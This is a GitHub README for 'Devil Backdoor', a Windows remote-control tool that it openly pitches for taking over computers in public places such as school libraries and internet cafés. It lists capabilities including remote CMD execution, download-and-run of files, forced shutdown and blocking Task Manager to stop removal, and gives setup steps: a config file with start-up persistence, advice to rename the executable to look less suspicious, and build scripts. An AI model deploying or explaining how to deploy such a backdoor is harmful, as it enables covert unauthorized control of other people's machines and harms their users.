Skip to content

Kirlovon/devil-backdoor

Folders and files

NameName
Last commit message
Last commit date

Latest commit

 

History

51 Commits
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 

Repository files navigation

Devil Backdoor

This is a simple backdoor made to control computers in various public places, like school library, internet café, etc.

Devil Preview

license GitHub repo size in bytes GitHub last commit

Features

  • Show MessageBox - allows you to show a window with a message! (Important: Only English letters are supported)
  • Execute to CMD - allows you to run a CMD command on another system!
  • Shutdown - allows you to turn off the computer!
  • Load File - allows you to download and run the file on another system! With this function, you can modify and supplement the backdoor capabilities!
  • Crazy Mouse - the cursor will move to a random position!
  • Block Task Manager - allows you to block the task manager. This feature can be used to prevent server disconnection.

How to use it?

1. Server setup

First, you need to make sure that all computers are connected to the same shared folder. You must put the Devil-Server.exe (You can rename this file for something less troubling) and the config.ini (This file can not be renamed) in the same folder, at any place on the hard drive of the computer.

Now, you must fill config.ini file:

[Config]

ClientID=Client     # There must be an ID (Any meaning or word)
ServerPatch=C:\     # There must be the path to the shared folder
ControlPanelPatch=Devil-ControlPanel.exe    # There must be the path to the Control Panel ( Optional )
AddToStartup=True     # Put there True or False
Speed=50     # The time that the server will wait for next data file check

Save config file, and run Devil-Server.exe! If you put True in the AddToStartup, after start you should see "Devil Server added to start-up" message.

2. Control Panel usage

Run Devil-ControlPanel.exe. If you fill ControlPanelPatch option in config file, you can press Hotkey to run Control Panel, ( Default hotkey is PAUSE ) and enter the password specified in the code. (Default is QWERTY)
Next, in the window that appears, select the shared folder. When the interface appears, in the inputbox type the ClientID to select client, that will receive the command.

Building

In Build folder you can find 2 files: build_x86.cmd and build_x64.cmd. Run one of this files, to build backdoor.


Devil-Backdoor project is for informational purposes only! You take full responsibility for using this software!